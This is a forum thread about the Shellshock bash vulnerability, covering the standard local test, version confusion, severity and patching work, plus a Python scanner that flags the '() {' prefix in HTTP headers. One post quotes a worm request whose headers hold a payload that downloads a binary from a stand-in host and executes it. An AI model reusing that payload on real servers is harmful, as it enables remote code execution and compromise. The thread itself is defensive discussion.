Shellshock??

Info, I checked & did a version check.

edward78@edward78-System-Product-Name ~ $ env x='() { :;}; echo vulnerable' bash -c 'echo hello'
vulnerable
hello
edward78@edward78-System-Product-Name ~ $ bash --version
GNU bash, version 4.2.45(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

So it says: if you get version 3.2.51(1)-release as a result, you'll need to update. I have 4.2, but it says I am vulnerable.
 
So did you update? I ran the test and got a vulnerable return, did an update and it was fixed.

I also heard that it's not as big an issue as people were making out.
 
I disagree on it not being a big issue. From what I can make out, if you get access to the web-based control panel on some servers, network hardware, etc., you can potentially exploit features on it, if they execute a script or command to do whatever they do, to execute commands at the same level as the associated user.
 
So it says: if you get version 3.2.51(1)-release as a result, you'll need to update. I have 4.2, but it says I am vulnerable.

That'll be because 4.2 is, and always has been, known to be vulnerable as well.

As to how important it is... all I can say is that opinion does differ. Where I work we are treating it as an urgent issue, whereas some of our sister teams in other parts of Europe do not agree... But that's not stopping us sorting out many of the systems we look after in the UK.
 
I updated my servers twice (when they pushed each of the bash updates)

I think it is a pretty big deal considering it can allow code execution with root access.
It's already been utilized by botnet/worm developers and is going through the net.

It also affects IBM z/OS, which could be a huge problem as they might not get updated.

Here is an example of the bot/worm hitting a server:

GET / HTTP/1.0
User-Agent: Thanks-Rob
Cookie: () { :; }; wget -O /tmp/besh http://malicious_ip/nginx; chmod 777 /tmp/besh; /tmp/besh;
Host: () { :; }; wget -O /tmp/besh http://malicious_ip/nginx; chmod 777 /tmp/besh; /tmp/besh;
Referer: () { :; }; wget -O /tmp/besh http://malicious_ip/nginx; chmod 777 /tmp/besh; /tmp/besh;
Accept: */*

I'm sure any of you who know bash/Linux can see what's going on here.
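The request above is the kind of thing a defender wants to spot in web server logs: the `() {` function-definition prefix in a header value that a CGI gateway would export to bash as an environment variable. The following is an added example, not code from the thread or from any project it mentions; it parses a raw HTTP request and reports which headers carry that prefix. The two sample requests are constructed here, with the worm's download-and-run payload replaced by a harmless placeholder command.

```python
import re

# Regex for the "() {" prefix that an unpatched bash would evaluate when it
# appeared at the start of an environment variable's value. Whitespace
# between the tokens is tolerated, as in the "(){ :;};" form seen in the wild.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_headers(raw_request: str) -> dict:
    """Split a raw HTTP request (request line plus headers) into a header dict.

    Only the part up to the first blank line is read; a body, if any, is ignored.
    """
    lines = raw_request.strip().splitlines()
    headers = {}
    for line in lines[1:]:  # lines[0] is the request line, e.g. "GET / HTTP/1.0"
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def flag_shellshock(raw_request: str) -> list:
    """Return the names of every header whose value contains the '() {' prefix.

    Every header is checked, not just Cookie/Host/Referer, because a CGI
    gateway exports any client-supplied header as an HTTP_* variable.
    """
    return [name for name, value in parse_headers(raw_request).items()
            if SHELLSHOCK_RE.search(value)]


def scan_requests(requests: list) -> list:
    """Scan several raw requests; return (index, flagged headers) for each hit."""
    hits = []
    for i, req in enumerate(requests):
        flagged = flag_shellshock(req)
        if flagged:
            hits.append((i, flagged))
    return hits


# Constructed sample: the shape of the worm request quoted above, with the
# payload after the prefix reduced to a placeholder.
WORM_REQUEST = """GET / HTTP/1.0
User-Agent: Thanks-Rob
Cookie: () { :; }; /bin/true
Host: () { :; }; /bin/true
Referer: () { :; }; /bin/true
Accept: */*
"""

# Constructed sample: an ordinary request that must not be flagged.
BENIGN_REQUEST = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Accept: */*
"""

if __name__ == "__main__":
    for idx, headers in scan_requests([BENIGN_REQUEST, WORM_REQUEST]):
        print(f"request {idx}: Shellshock prefix in headers {headers}")
```

The check is deliberately broad: it matches the prefix rather than any particular payload, so the same scan catches probes that only run `ping` or `echo` as well as the download-and-execute variant in the thread. Run it over whatever raw request capture you have (a reverse proxy's full-request log, or a packet capture exported as text); a standard access log that records only the request line and User-Agent will miss payloads carried in Cookie, Host or Referer.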
 
Ahh, I was expecting the binary payload to be a shell script. Binary payload makes it even worse then.

Thankfully my only Internet facing server is secure against it
 
Ahh, I was expecting the binary payload to be a shell script. Binary payload makes it even worse then.

Thankfully my only Internet facing server is secure against it

Worst case, you can execute any bash command at the privilege level of the host user, which means you can pretty much do anything that user can, including downloading remote files. If that user has root privileges, or security is poor (you can guess the SU password, or know of flaws in that OS to get full access), you can do pretty much anything.

I've not played with it much, but I'm guessing any web control panel that has a feature using unfiltered text input, and drops back directly to the script host to execute a command or script using that input, could potentially be exploited.
 
It's been a right pain for me the last week patching over 60 Linux servers of various flavours... more so because a lot of them are in the States and organising reboots was a pain with the time difference... Why the hell our architecture team chose Ubuntu I don't know... not an enterprise O/S in my opinion...
 
This is causing a major headache for me too.

Got about 1000 servers that need this patched all in different countries too!

Going to be one of those weeks!
 
It all depends on your stack as far as I can tell. If you allow CGI, Tomcat, or allow system calls through php-fpm, then you're basically screwed (without the patch); otherwise it's much less of an issue.
 